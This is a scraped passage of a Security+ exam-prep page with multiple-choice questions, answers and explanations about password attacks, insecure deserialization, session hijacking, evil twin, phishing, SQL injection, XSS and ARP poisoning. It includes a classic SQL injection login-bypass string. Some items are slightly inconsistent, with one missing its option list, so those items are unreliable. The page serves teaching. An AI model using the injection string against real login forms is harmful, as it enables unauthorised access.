` into a public comment field, and other visitors see the script run in the…","url":"https://courseiva.com/questions/comptia/security-plus/a-user-enters-alert-test-into-a-public-comment-field-and-other"},{"@type":"ListItem","position":32,"name":"A security analyst is reviewing authentication logs from a corporate web application. The logs show thousands of failed …","url":"https://courseiva.com/questions/comptia/security-plus/a-security-analyst-is-reviewing-authentication-logs-from-a"},{"@type":"ListItem","position":33,"name":"Based on the exhibit, what network attack is most likely occurring on the office LAN?","url":"https://courseiva.com/questions/comptia/security-plus/based-on-the-exhibit-what-network-attack-is-most-likely"},{"@type":"ListItem","position":34,"name":"A security tool reports repeated DNS requests for long, random-looking subdomains under the same domain name. What is th…","url":"https://courseiva.com/questions/comptia/security-plus/a-security-tool-reports-repeated-dns-requests-for-long-random"},{"@type":"ListItem","position":35,"name":"A SaaS portal issues signed JWTs in a browser cookie. The help desk confirms a user logged out at 09:10, but SIEM logs s…","url":"https://courseiva.com/questions/comptia/security-plus/a-saas-portal-issues-signed-jwts-in-a-browser-cookie-the-help"},{"@type":"ListItem","position":36,"name":"During testing of a shopping portal, a POST request to /api/address/update succeeds even when the anti-CSRF token is rem…","url":"https://courseiva.com/questions/comptia/security-plus/during-testing-of-a-shopping-portal-a-post-request-to-api"},{"@type":"ListItem","position":37,"name":"EDR alerts show a finance laptop spawning an unsigned executable from %AppData%, attempting to read LSASS memory, and ma…","url":"https://courseiva.com/questions/comptia/security-plus/edr-alerts-show-a-finance-laptop-spawning-an-unsigned-executable"},{"@type":"ListItem","position":38,"name":"An employee receives a text message from \"IT Help\" saying their account will be disabled unless they tap a link and ente…","url":"https://courseiva.com/questions/comptia/security-plus/an-employee-receives-a-text-message-from-it-help-saying-their"},{"@type":"ListItem","position":39,"name":"A vulnerability scanner reports a critical issue on a Linux server. The administrator checks the application and confirm…","url":"https://courseiva.com/questions/comptia/security-plus/a-vulnerability-scanner-reports-a-critical-issue-on-a-linux"},{"@type":"ListItem","position":40,"name":"A customer service application shows the same session ID being used from two countries within five minutes. The legitima…","url":"https://courseiva.com/questions/comptia/security-plus/a-customer-service-application-shows-the-same-session-id-being"},{"@type":"ListItem","position":41,"name":"A security analyst receives reports that several employees are being redirected to a fraudulent login page after typing …","url":"https://courseiva.com/questions/comptia/security-plus/a-security-analyst-receives-reports-that-several-employees-are"},{"@type":"ListItem","position":42,"name":"Based on the exhibit, what wireless threat is most likely occurring?","url":"https://courseiva.com/questions/comptia/security-plus/based-on-the-exhibit-what-wireless-threat-is-most-likely"},{"@type":"ListItem","position":43,"name":"Users on one VLAN report that their traffic to the default gateway is intermittently slow and sometimes reaches the wron…","url":"https://courseiva.com/questions/comptia/security-plus/users-on-one-vlan-report-that-their-traffic-to-the-default"},{"@type":"ListItem","position":44,"name":"An attacker calls the service desk claiming to be a traveling contractor whose phone was stolen. They know the contracto…","url":"https://courseiva.com/questions/comptia/security-plus/an-attacker-calls-the-service-desk-claiming-to-be-a-traveling"},{"@type":"ListItem","position":45,"name":"After installing a free utility from an unofficial website, a user's laptop starts quietly sending browsing data to an u…","url":"https://courseiva.com/questions/comptia/security-plus/after-installing-a-free-utility-from-an-unofficial-website-a"},{"@type":"ListItem","position":46,"name":"A caller claims to be from the company's SaaS provider and says a tenant migration will fail unless the help desk reads …","url":"https://courseiva.com/questions/comptia/security-plus/a-caller-claims-to-be-from-the-company-s-saas-provider-and-says"},{"@type":"ListItem","position":47,"name":"A security analyst notices that several employees have received an email with the subject line 'Urgent: Password Reset R…","url":"https://courseiva.com/questions/comptia/security-plus/a-security-analyst-notices-that-several-employees-have-received"},{"@type":"ListItem","position":48,"name":"During a workstation review, analysts find a process injecting into explorer.exe and reading keyboard and clipboard even…","url":"https://courseiva.com/questions/comptia/security-plus/during-a-workstation-review-analysts-find-a-process-injecting"},{"@type":"ListItem","position":49,"name":"Threat intelligence shows an attacker changes the domain name every day, but the malware file hash stays the same across…","url":"https://courseiva.com/questions/comptia/security-plus/threat-intelligence-shows-an-attacker-changes-the-domain-name"},{"@type":"ListItem","position":50,"name":"Finance staff receive an email from the 'CFO' using a lookalike domain. The message requests an urgent gift-card purchas…","url":"https://courseiva.com/questions/comptia/security-plus/finance-staff-receive-an-email-from-the-cfo-using-a-lookalike"},{"@type":"ListItem","position":51,"name":"A vulnerability scan reports three findings: a critical remote code execution issue on an internet-facing VPN appliance …","url":"https://courseiva.com/questions/comptia/security-plus/a-vulnerability-scan-reports-three-findings-a-critical-remote"},{"@type":"ListItem","position":52,"name":"Based on the exhibit, which control should be enabled to mitigate this issue?","url":"https://courseiva.com/questions/comptia/security-plus/based-on-the-exhibit-which-control-should-be-enabled-to-mitigate"},{"@type":"ListItem","position":53,"name":"A vulnerability scan finds an administrative SSH service listening on 0.0.0.0 on a server that should be managed only fr…","url":"https://courseiva.com/questions/comptia/security-plus/a-vulnerability-scan-finds-an-administrative-ssh-service"},{"@type":"ListItem","position":54,"name":"Based on the exhibit, which malware type is most likely involved?","url":"https://courseiva.com/questions/comptia/security-plus/based-on-the-exhibit-which-malware-type-is-most-likely-involved"},{"@type":"ListItem","position":55,"name":"A help desk technician receives a phone call from someone who claims to be the CFO. The caller knows the executive team …","url":"https://courseiva.com/questions/comptia/security-plus/a-help-desk-technician-receives-a-phone-call-from-someone-who"},{"@type":"ListItem","position":56,"name":"A branch office reports intermittent failures reaching internal sites. DHCP logs show clients receiving leases from an u…","url":"https://courseiva.com/questions/comptia/security-plus/a-branch-office-reports-intermittent-failures-reaching-internal"},{"@type":"ListItem","position":57,"name":"A scan of a web server hosting an internal help-desk portal reports these findings: `/var/www/uploads` is world-writable…","url":"https://courseiva.com/questions/comptia/security-plus/a-scan-of-a-web-server-hosting-an-internal-help-desk-portal"},{"@type":"ListItem","position":58,"name":"Based on the exhibit, what type of malware is most likely present?","url":"https://courseiva.com/questions/comptia/security-plus/based-on-the-exhibit-what-type-of-malware-is-most-likely-present-2"},{"@type":"ListItem","position":59,"name":"Based on the exhibit, which indicator should the security team prioritize for endpoint detection and hunting?\r\n\r\nThe att…","url":"https://courseiva.com/questions/comptia/security-plus/based-on-the-exhibit-which-indicator-should-the-security-team"},{"@type":"ListItem","position":60,"name":"A SOC analyst reviews an alert on a workstation where PowerShell launched from a scheduled task, downloaded an encoded c…","url":"https://courseiva.com/questions/comptia/security-plus/a-soc-analyst-reviews-an-alert-on-a-workstation-where-powershell"},{"@type":"ListItem","position":61,"name":"A user receives a phone call from someone who claims to be a member of the company's IT support team. The caller states …","url":"https://courseiva.com/questions/comptia/security-plus/a-user-receives-a-phone-call-from-someone-who-claims-to-be-a"},{"@type":"ListItem","position":62,"name":"A support portal lets users upload files and name them manually. During review, a tester submits a filename containing p…","url":"https://courseiva.com/questions/comptia/security-plus/a-support-portal-lets-users-upload-files-and-name-them-manually"},{"@type":"ListItem","position":63,"name":"An organization wants to reduce the risk of malware infections from removable media. Which three of the following contro…","url":"https://courseiva.com/questions/comptia/security-plus/an-organization-wants-to-reduce-the-risk-of-malware-infections-from-removable-me-qnhjixur"},{"@type":"ListItem","position":64,"name":"Several employees receive a text message that says their payroll deposit failed and they must tap a link to verify accou…","url":"https://courseiva.com/questions/comptia/security-plus/several-employees-receive-a-text-message-that-says-their-payroll"},{"@type":"ListItem","position":65,"name":"A finance manager gets a phone call from someone claiming to be the CEO's assistant, urgently requesting a wire transfer…","url":"https://courseiva.com/questions/comptia/security-plus/a-finance-manager-gets-a-phone-call-from-someone-claiming-to-be"},{"@type":"ListItem","position":66,"name":"A vulnerability scan produces these results:\r\n- Finding 1: High severity, internet-facing VPN appliance, known exploit a…","url":"https://courseiva.com/questions/comptia/security-plus/a-vulnerability-scan-produces-these-results-finding-1-high"},{"@type":"ListItem","position":67,"name":"A threat report says an attacker changes domains daily and rehosts infrastructure in cloud VPS environments, but the phi…","url":"https://courseiva.com/questions/comptia/security-plus/a-threat-report-says-an-attacker-changes-domains-daily-and"},{"@type":"ListItem","position":68,"name":"A workstation opens an attachment labeled as an invoice and then begins creating scheduled tasks, disabling security ser…","url":"https://courseiva.com/questions/comptia/security-plus/a-workstation-opens-an-attachment-labeled-as-an-invoice-and-then"},{"@type":"ListItem","position":69,"name":"A user's laptop suddenly shows encrypted .docx files, a ransom note, and the EDR console reports mass file renames and s…","url":"https://courseiva.com/questions/comptia/security-plus/a-user-s-laptop-suddenly-shows-encrypted-docx-files-a-ransom"},{"@type":"ListItem","position":70,"name":"A caller says they are from the help desk and need the employee's MFA code to \"complete a password reset\". Which social …","url":"https://courseiva.com/questions/comptia/security-plus/a-caller-says-they-are-from-the-help-desk-and-need-the-employee"},{"@type":"ListItem","position":71,"name":"Users on the internal Wi-Fi report that the finance portal suddenly resolves to a different IP address, and the browser …","url":"https://courseiva.com/questions/comptia/security-plus/users-on-the-internal-wi-fi-report-that-the-finance-portal"},{"@type":"ListItem","position":72,"name":"A vulnerability scan finds two issues: a critical deserialization flaw on a non-production lab server behind a VPN, and …","url":"https://courseiva.com/questions/comptia/security-plus/a-vulnerability-scan-finds-two-issues-a-critical-deserialization"},{"@type":"ListItem","position":73,"name":"A SOC analyst sees repeated encoded PowerShell launched by mshta.exe. No new executable is written to disk, but the host…","url":"https://courseiva.com/questions/comptia/security-plus/a-soc-analyst-sees-repeated-encoded-powershell-launched-by-mshta"},{"@type":"ListItem","position":74,"name":"A report generator accepts a user-supplied report name and then passes it into a shell command to convert a file. During…","url":"https://courseiva.com/questions/comptia/security-plus/a-report-generator-accepts-a-user-supplied-report-name-and-then"},{"@type":"ListItem","position":75,"name":"A security analyst is investigating a series of alerts from the web application firewall. Users are reporting that when …","url":"https://courseiva.com/questions/comptia/security-plus/a-security-analyst-is-investigating-a-series-of-alerts-from-the"}]}
A security analyst reviews authentication logs and discovers hundreds of failed login attempts from a single external IP address within a five-minute window. All attempts target the same username 'jsmith' but use different passwords. Which type of password attack does this pattern most likely indicate?
A.Password spraying
B.Brute force
C.Credential stuffing
D.Dictionary attack
AnswerB
Correct. A brute force attack systematically tries many passwords against a single account. The log pattern of hundreds of different passwords for the same username matches this method.
Why this answer
The pattern of hundreds of failed login attempts from a single external IP address targeting the same username 'jsmith' with different passwords is characteristic of a brute force attack. In a brute force attack, the attacker systematically tries many password guesses against a single account to eventually find the correct credential. This contrasts with password spraying, where a few common passwords are tried against many usernames, and credential stuffing, which uses previously compromised username/password pairs from other breaches.
Exam trap
The trap here is confusing brute force with password spraying: candidates often pick password spraying because they see 'different passwords,' but the key differentiator is the single target username versus multiple usernames, which defines the attack vector.
How to eliminate wrong answers
Option A is wrong because password spraying involves trying a small number of common passwords (e.g., 'Password123', 'Welcome1') against many different usernames to avoid account lockouts, not hundreds of different passwords against a single username. Option C is wrong because credential stuffing uses known username/password combinations from previous data breaches, not random or systematically generated passwords, and would typically show a mix of successes and failures rather than all failures with varying passwords.
A Java web service accepts a Base64-encoded `profile` object from the browser. During testing, changing a serialized field from `role=user` to `role=admin` causes a deserialization error unless the original signed blob is reused. When a captured valid blob is modified only slightly, the application reconstructs a different class and then exposes an internal admin page. Which attack pattern is most likely?
A.Insecure deserialization, because untrusted serialized data is being reconstructed into server-side objects.
B.SQL injection, because the attacker is changing a field to access a different page.
C.Cross-site request forgery, because the browser is sending a forged request to the application.
D.Cross-site scripting, because the modified object exposes an internal admin page.
AnswerA
Insecure deserialization is the best fit because the application accepts a serialized object from an untrusted source and turns it back into live server-side data. The fact that a small modification changes object behavior shows the server is trusting attacker-controlled serialized content. That can lead to authorization bypass, object confusion, or even code execution depending on the framework and validation controls.
Why this answer
The correct answer is A because the scenario describes a classic insecure deserialization attack. The Java web service accepts a Base64-encoded serialized object from the browser and reconstructs it into server-side objects without integrity verification. When the attacker modifies a serialized field (role=user to role=admin), the application deserializes the tampered data, which causes a deserialization error unless the original signed blob is reused, but a slight modification reconstructs a different class and exposes an internal admin page.
This directly matches the OWASP Top 10 insecure deserialization pattern where untrusted data is deserialized, leading to object injection and privilege escalation.
Exam trap
The trap here is that candidates may confuse the symptom (accessing an admin page) with a web-based attack like XSS or CSRF, but the root cause is the insecure deserialization of untrusted serialized data, not client-side script injection or request forgery.
How to eliminate wrong answers
Option B is wrong because SQL injection involves injecting malicious SQL queries into input fields to manipulate a database, not modifying serialized object fields to change server-side class behavior or access pages. Option C is wrong because cross-site request forgery (CSRF) relies on tricking a user's browser into sending an authenticated request to a target application, not on manipulating serialized data to alter server-side object reconstruction. Option D is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, not modifying serialized objects to cause server-side deserialization of a different class.
A help desk technician reviews a ticket where a user says they logged out of the payroll portal, but another employee who found the session cookie in a browser debug log could still access the account until the session expired. Which attack best matches this behavior?
A.Session hijacking, because a stolen session token was reused to impersonate the user.
B.Pretexting, because the attacker pretended to be an authorized employee on a phone call.
C.CSRF, because the victim was tricked into sending unwanted requests from their browser.
D.Insecure deserialization, because serialized objects were accepted without validation.
AnswerA
If a valid session cookie can be reused by someone else, the attacker is effectively taking over the active session without knowing the password.
Why this answer
Option A is correct because the described behavior—where a session cookie stolen from a browser debug log is reused by another employee to access the payroll portal—is a classic session hijacking attack. Session hijacking occurs when an attacker captures a valid session token (e.g., a cookie containing a session ID) and uses it to impersonate the authenticated user, bypassing the need for credentials. In this case, the session cookie was not invalidated upon logout, allowing the attacker to reuse it until the session's expiration time.
Exam trap
The trap here is that candidates may confuse session hijacking with CSRF, but the key distinction is that session hijacking involves stealing and reusing an existing session token, whereas CSRF tricks the victim's browser into performing actions using the victim's own active session.
How to eliminate wrong answers
Option B is wrong because pretexting involves fabricating a scenario (e.g., a phone call) to trick a victim into divulging information, but the question describes a technical attack using a stolen session cookie, not social engineering. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks a victim's browser into sending unwanted requests while the victim is authenticated, but here the attacker directly reuses a stolen session token without involving the victim's browser.
A security analyst receives an alert about a user account attempting to access multiple network shares in rapid succession within a short time frame. The analyst reviews the logs and sees that the IP address originates from the internal network, but the user is currently on leave. Which type of attack is most likely occurring?
A.Pass-the-hash attack
B.Brute-force attack
C.Credential stuffing attack
D.Internal reconnaissance
AnswerD
Internal reconnaissance involves an attacker who has already compromised a system and is now scanning internal resources to identify valuable data or further targets. The rapid access to multiple network shares aligns with this activity.
Why this answer
The correct answer is D because the behavior—an internal IP address rapidly querying multiple network shares—is characteristic of internal reconnaissance, where an attacker who has already gained a foothold maps out available resources. The user being on leave indicates the account is compromised, and the rapid succession of share access attempts is a classic sign of automated enumeration (e.g., using `net view` or SMB queries) rather than a direct credential attack.
Exam trap
The trap here is that candidates confuse the rapid enumeration of network shares with a brute-force or credential-based attack, failing to recognize that the attacker is already authenticated and is simply mapping the network for further exploitation.
How to eliminate wrong answers
Option A is wrong because a pass-the-hash attack uses captured NTLM hashes to authenticate without knowing the plaintext password, but the alert describes rapid share access, not a lateral movement technique that reuses a hash. Option B is wrong because a brute-force attack tries many passwords against a single account or service, whereas this scenario shows a single account attempting many shares, not repeated login failures. Option C is wrong because credential stuffing uses previously breached username/password pairs against multiple services, but the logs show a single internal IP accessing multiple shares, not login attempts across different applications or websites.
After a facilities outage, multiple employees report that their phones automatically joined a network named "CorpWiFi" in the lobby even though the legitimate access point was offline. A nearby attacker device then captured the captive portal login traffic. What attack is most likely?
A.Rogue access point
B.Evil twin
C.Bluetooth bluejacking
D.NFC relay attack
AnswerB
An evil twin mimics a trusted wireless network name and often a stronger signal to lure devices into connecting to it.
Why this answer
The correct answer is B, Evil twin. In this scenario, the attacker set up a rogue access point with the same SSID ("CorpWiFi") as the legitimate network, which was offline. When employees' phones automatically attempted to reconnect to a known SSID, they associated with the attacker's device, which then presented a fake captive portal to capture login credentials.
This is the classic definition of an evil twin attack: a fraudulent AP that mimics a legitimate one to intercept traffic.
Exam trap
The trap here is confusing an evil twin with a rogue access point; candidates often pick 'rogue access point' because both involve unauthorized APs, but the key distinction is that an evil twin mimics a legitimate SSID to intercept traffic, while a rogue AP is physically connected to the internal network.
How to eliminate wrong answers
Option A is wrong because a rogue access point is an unauthorized AP plugged into the corporate network, not a fake AP set up to mimic an offline legitimate AP; here the attacker's device is not connected to the corporate LAN. Option C is wrong because Bluetooth bluejacking involves sending unsolicited messages over Bluetooth, not capturing Wi-Fi captive portal traffic or spoofing an SSID. Option D is wrong because an NFC relay attack extends the range of an NFC transaction (e.g., contactless payment) by relaying signals between two devices, and does not involve Wi-Fi SSID spoofing or captive portal interception.
Based on the exhibit, what should the employee do first?
A.Reply with the code because the request appears to come from payroll support.
B.Report the message through the company’s phishing-report process and do not share the code.
C.Forward the email to coworkers so they can watch for the same request.
D.Open the attached file to see whether it contains the payroll fix details.
AnswerB
The message is a social engineering attempt that tries to pressure the user into revealing an MFA code. Reporting it quickly helps the security team investigate, warn others, and block related messages. The employee should never provide the code, even if the sender claims to be from payroll or support.
Why this answer
Option B is correct because the message exhibits classic social engineering indicators: an unsolicited request for a sensitive code, urgency, and a spoofed sender address. The employee must report it via the company's phishing-report process to alert the security team and must not share the code, as that would compromise the account. This aligns with security awareness training that emphasizes verifying requests out-of-band and never providing credentials or codes in response to email requests.
Exam trap
The trap here is that candidates may assume the email is legitimate because it appears to come from an internal department (payroll support) and uses urgent language, leading them to choose Option A or D, when in fact any unsolicited request for sensitive information or action should be treated as a potential phishing attempt.
How to eliminate wrong answers
Option A is wrong because replying with the code would directly compromise the employee's account, as the request is a phishing attempt, not a legitimate payroll support request. Option C is wrong because forwarding the email to coworkers could propagate the phishing attack and increase the number of compromised accounts, violating the principle of containment. Option D is wrong because opening an attached file from an unsolicited email could execute malware or trigger a credential-harvesting payload, even if the attachment appears to be a payroll fix document.
An employee receives an email that appears to come from the company's payroll provider. It says payroll documents will be deleted today unless the employee signs in through the included link. What is the best first action?
A.Click the link quickly and sign in to avoid losing the documents.
B.Report the message and verify the request using a trusted contact method.
C.Reply to the sender and ask whether the message is legitimate.
D.Forward the email to coworkers so they can watch for the same warning.
AnswerB
This avoids interacting with a potentially malicious message and confirms the request safely.
Why this answer
Option B is correct because the email exhibits classic signs of a phishing attack—urgency, a threat of data loss, and a link to a fake login page. The best first action is to report the suspicious message to the security team and independently verify the request by contacting the payroll provider through a trusted channel (e.g., a known phone number or a previously bookmarked URL). This prevents credential theft and potential account compromise.
Exam trap
The trap here is that candidates may think replying to the sender (Option C) is a safe way to verify legitimacy, but in reality, it confirms the email address as active and can expose the user to further social engineering or malware delivery.
How to eliminate wrong answers
Option A is wrong because clicking the link and signing in would directly hand over the employee's credentials to an attacker, enabling account takeover and potential lateral movement within the network. Option C is wrong because replying to the sender confirms the email address is active and monitored, which can lead to targeted follow-up attacks; the sender's address is likely spoofed or compromised, so the reply would go to the attacker. Option D is wrong because forwarding the email to coworkers spreads the phishing threat, increasing the number of potential victims and the attack surface; the correct procedure is to report the email to the security team for analysis and blocking.
A help desk technician reports several workstations are suddenly showing lots of pop-up ads and browser redirects after users installed a free media player. What type of unwanted software is most likely present?
A.Ransomware
B.Adware
C.Rootkit
D.Logic bomb
AnswerB
Adware commonly causes pop-ups, redirects, and unwanted advertising behavior after installation.
Why this answer
Adware is the most likely culprit because it is a type of unwanted software designed to display intrusive advertisements, often through pop-up ads and browser redirects. The infection vector—users installing a free media player—is a classic distribution method for adware, which bundles itself with legitimate software to generate revenue via ad impressions. Unlike ransomware or rootkits, adware does not encrypt files or hide its presence; it directly manipulates browser sessions to serve ads.
Exam trap
The trap here is that candidates may confuse the symptoms of adware with ransomware or a rootkit because pop-ups and redirects can sometimes be caused by more severe malware, but the specific context of a free media player installation points directly to adware as the most likely type of unwanted software.
How to eliminate wrong answers
Option A is wrong because ransomware encrypts files or locks the system and demands a ransom, which does not align with the symptoms of pop-up ads and browser redirects. Option C is wrong because a rootkit is designed to hide its presence and provide persistent, stealthy access to an attacker, not to generate visible pop-up ads or browser redirects. Option D is wrong because a logic bomb is a piece of code that executes a malicious function when a specific condition is met (e.g., a date or user action), and it does not cause ongoing ad displays or browser redirects.
A web login form uses unsanitized input in the backend query. When an attacker enters `' OR '1'='1'--` into the username field, the application grants access without a valid password. Which attack pattern is being used?
A.Cross-site scripting, because the attacker is trying to run code in the browser.
B.SQL injection, because the input changes the meaning of the database query.
C.Broken session management, because the user is still logged in after leaving the page.
D.Insecure deserialization, because the application accepts user input.
AnswerB
SQL injection occurs when untrusted input is embedded into a query and alters the intended logic. The crafted string closes the original condition and adds a statement that evaluates as true, which can bypass authentication checks. This is a classic sign that the application is constructing queries unsafely instead of using parameterized statements or properly bound variables.
Why this answer
Option B is correct because the attacker's input (`' OR '1'='1'--`) is a classic SQL injection payload that alters the structure of the backend SQL query. By injecting a tautology (`OR '1'='1'`) and commenting out the rest of the query with `--`, the attacker bypasses authentication, causing the database to return a valid row without requiring a correct password.
Exam trap
The trap here is that candidates may confuse SQL injection with cross-site scripting because both involve untrusted input, but SQL injection targets the database layer through query manipulation, whereas XSS targets the client-side DOM or browser execution context.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) that execute in a user's browser, not altering a backend database query. Option C is wrong because broken session management refers to flaws in session token generation, handling, or expiration (e.g., predictable cookies or missing logout), not to input manipulation that changes a query's logic. Option D is wrong because insecure deserialization involves the processing of untrusted serialized objects (e.g., PHP or Java serialization streams) to achieve code execution or privilege escalation, not the injection of SQL syntax into a query string.
Based on the exhibit, which social engineering attack is most likely?
A.Phishing
B.Vishing
C.Baiting
D.Pretexting
AnswerB
The attacker is using a phone call to impersonate support staff and pressure the user into sharing an MFA code. That is voice-based phishing, or vishing. The fabricated ticket number, urgency around payroll, and caller ID spoofing are classic social engineering clues. The goal is credential or factor theft through a believable phone pretext rather than a malicious link or attachment.
Why this answer
The exhibit shows a voicemail message instructing the recipient to call a specific phone number to verify account activity. This is a classic vishing (voice phishing) attack, where the attacker uses a phone call or voicemail to trick the victim into providing sensitive information or calling a fraudulent number. Unlike phishing, which uses email or text, vishing relies on voice communication channels.
Exam trap
The trap here is that candidates may confuse vishing with pretexting, but vishing specifically uses voice communication (phone call or voicemail) as the attack vector, whereas pretexting can occur via any medium and focuses on the fabricated story.
How to eliminate wrong answers
Option A is wrong because phishing typically involves email or text messages with malicious links or attachments, not a voicemail instructing a phone call. Option C is wrong because baiting involves offering something enticing (e.g., a free USB drive) to lure the victim into a trap, not a voice-based request. Option D is wrong because pretexting involves creating a fabricated scenario (pretext) to obtain information, often through impersonation, but the exhibit specifically uses a voicemail to initiate a phone call, which is the hallmark of vishing.
A public-facing file transfer server is running an appliance firmware version that is now end-of-life. The vendor has stated that no further security patches will be released. Management wants the best long-term fix before the next audit. What should be done?
A.Increase logging and keep the current firmware until a problem appears.
B.Move the server to a different subnet and continue using the same firmware.
C.Replace or upgrade the end-of-life firmware with a supported version.
D.Change the administrator password and leave the device in place.
AnswerC
Replacing or upgrading the unsupported firmware is the best long-term fix because it restores the ability to receive patches and vendor support. That directly addresses the outdated component risk instead of merely masking it with monitoring or network controls.
Why this answer
Option C is correct because running end-of-life firmware means no security patches will be released, leaving the server vulnerable to known exploits. The best long-term fix is to replace or upgrade to a supported firmware version that receives ongoing security updates, ensuring the system remains secure for the next audit and beyond.
Exam trap
CompTIA often tests the misconception that compensating controls like logging, segmentation, or password changes are sufficient to mitigate end-of-life vulnerabilities, when the only proper long-term fix is to upgrade or replace the unsupported software.
How to eliminate wrong answers
Option A is wrong because increasing logging does not address the underlying vulnerability; it only provides visibility into attacks without preventing them, and waiting for a problem to appear could lead to a breach. Option B is wrong because moving the server to a different subnet does not fix the firmware vulnerabilities; it only provides network segmentation, but the server remains exposed to attacks that exploit the unpatched firmware, and lateral movement from a compromised host could still occur. Option D is wrong because changing the administrator password does not remediate the known security flaws in the end-of-life firmware; it only addresses credential management, leaving the system vulnerable to remote code execution or other exploits that bypass authentication.
A security analyst is reviewing the source code of a custom network service written in C. The service allocates a 256-byte buffer and uses the strcpy() function to copy incoming data into that buffer without verifying the length of the input. If an attacker sends a specially crafted payload that exceeds 256 bytes, which security control would be most effective at detecting and preventing the resulting exploitation at runtime?
Correct. Stack canaries are placed before the return address on the stack. If a buffer overflow overwrites the canary, the program terminates, preventing control-flow hijacking. This is a highly effective runtime defense against stack-based buffer overflows.
Why this answer
Stack canaries are the most effective runtime control for detecting and preventing buffer overflow exploitation. When a buffer overflow overwrites the stack, it corrupts a canary value placed between the buffer and the return address; before the function returns, the canary is checked, and if altered, the program terminates immediately, preventing arbitrary code execution.
Exam trap
The trap here is that candidates often confuse runtime exploit mitigation (stack canaries) with network security controls (TLS) or software supply chain controls (code signing), leading them to pick a control that does not operate at the memory level during execution.
How to eliminate wrong answers
Option B is wrong because Transport Layer Security (TLS) encrypts data in transit and provides authentication, but it does not prevent or detect buffer overflows in application code—the overflow occurs after decryption. Option C is wrong because code signing verifies the integrity and origin of the binary before execution, but it offers no runtime protection against memory corruption vulnerabilities like buffer overflows.
A forum lets users save a profile signature. One user enters a string containing script code, and later other users who view that profile see the script run in their browsers. What attack is this?
A.Cross-site scripting
B.Command injection
C.CSRF
D.Broken authentication
AnswerA
This is cross-site scripting because attacker-supplied script code is stored and then executed when other users view the content. The dangerous part is that the payload is delivered through a trusted website and runs in the victim's browser. Stored XSS is a common issue in profiles, comments, and forums.
Why this answer
This is a classic stored cross-site scripting (XSS) attack. The malicious script is permanently stored on the server (in the user's profile signature) and executed in the browsers of any other user who views that profile. The attack exploits the forum's failure to sanitize user input before rendering it in HTML, allowing arbitrary JavaScript to run in the victim's session context.
Exam trap
The trap here is that candidates often confuse stored XSS with reflected XSS or CSRF, but the key distinction is that the payload is permanently stored on the server and executed for every viewer, not just the attacker or a single victim.
How to eliminate wrong answers
Option B (Command injection) is wrong because command injection involves injecting OS commands into a server-side application (e.g., via a web form or API) that executes them on the host system, not client-side script execution in a browser. Option C (CSRF) is wrong because cross-site request forgery tricks an authenticated user into performing unintended actions on a trusted site, not injecting and executing script code in a stored profile field. Option D (Broken authentication) is wrong because broken authentication refers to flaws in login, session management, or credential handling (e.g., weak passwords, session fixation), not the injection of client-side scripts into stored content.
An EDR alert shows PowerShell launching from a scheduled task, downloading encoded commands, and running them in memory. No suspicious executable is written to disk. What kind of attack is this?
A.A fileless attack that relies on trusted tools already on the system
B.A worm that spreads by exploiting a network service
C.A logic bomb that waits for a specific date or event
D.A rootkit that changes kernel behavior to hide processes
AnswerA
Fileless attacks often use legitimate tools like PowerShell and keep payloads in memory instead of writing files.
Why this answer
This is a fileless attack because PowerShell, a trusted system tool, is used to download and execute encoded commands directly in memory without writing any malicious executable to disk. The attack leverages living-off-the-land binaries (LOLBins) and PowerShell's ability to run scripts in memory, bypassing traditional file-based detection mechanisms.
Exam trap
The trap here is that candidates may confuse 'fileless' with 'no file at all,' but the attack still uses system files (PowerShell) and may leave traces in event logs or memory, leading them to incorrectly choose rootkit or logic bomb options due to misunderstanding the attack's execution method.
How to eliminate wrong answers
Option B is wrong because a worm spreads by self-replicating across a network, often exploiting a service vulnerability, but this scenario describes a scheduled task triggering PowerShell to download and run commands, not autonomous propagation. Option C is wrong because a logic bomb activates based on a specific date or event, but here the trigger is a scheduled task without mention of a conditional payload tied to time or user action. Option D is wrong because a rootkit modifies kernel-level behavior to hide processes or files, whereas this attack operates at the user level using PowerShell and does not alter the operating system kernel.
A laptop user reports that many files now have strange extensions, a ransom note appears on the desktop, and the files cannot be opened. Which malware is most likely responsible?
A.Spyware
B.Ransomware
C.Rootkit
D.Worm
AnswerB
Ransomware encrypts files or blocks access to systems and then demands payment for recovery. Strange file extensions and a ransom note are common signs that the malware has encrypted local data.
Why this answer
Ransomware is the correct answer because it encrypts the user's files, appends a new extension (e.g., .encrypted or .locked), and displays a ransom note demanding payment for the decryption key. The symptoms of inaccessible files with altered extensions and a visible ransom note are the classic indicators of a ransomware infection, such as those caused by CryptoLocker or LockBit.
Exam trap
The trap here is that candidates may confuse ransomware with a worm because both can spread rapidly, but the key differentiator is the ransom note and file encryption, which are unique to ransomware.
How to eliminate wrong answers
Option A is wrong because spyware is designed to covertly monitor user activity and steal sensitive information (e.g., keystrokes, browsing habits) without altering file extensions or displaying ransom notes. Option C is wrong because a rootkit is a stealthy malware that hides its presence and other malicious processes from the operating system, typically by modifying kernel-level functions, and does not encrypt files or leave ransom notes. Option D is wrong because a worm is a self-replicating malware that spreads across networks by exploiting vulnerabilities (e.g., SMB EternalBlue) and does not inherently encrypt files or display ransom notes; its primary goal is propagation, not extortion.
During troubleshooting, several hosts in VLAN 20 lose access to the default gateway at random. Their ARP caches now map the gateway IP to a workstation MAC address, and traffic briefly flows through that workstation before timing out. What attack is most likely?
A.DNS poisoning, because the workstation name may be resolving to the wrong IP address.
B.ARP poisoning, because false ARP replies are redirecting gateway traffic to another host.
C.Replay attack, because the attacker is reusing old network frames to confuse the hosts.
D.Denial of service, because traffic eventually times out and connectivity is lost.
AnswerB
ARP poisoning fits exactly when a host sends falsified ARP information so victims associate the gateway IP with the attacker’s MAC address. That can enable interception, disruption, or man-in-the-middle behavior on the local subnet.
Why this answer
Option B is correct because the scenario describes classic ARP poisoning (also known as ARP spoofing). The attacker sends forged ARP replies to the hosts in VLAN 20, associating the gateway's IP address with the attacker's MAC address. This causes the hosts to forward traffic destined for the gateway to the attacker's workstation, where it is briefly forwarded (or dropped) before timing out, matching the symptoms of a man-in-the-middle attack via ARP cache corruption.
Exam trap
CompTIA often tests ARP poisoning by describing symptoms of gateway loss and ARP cache corruption, and the trap here is that candidates may confuse it with DNS poisoning because both involve redirection, but ARP poisoning operates at Layer 2 (MAC address) while DNS poisoning operates at Layer 7 (name resolution).
How to eliminate wrong answers
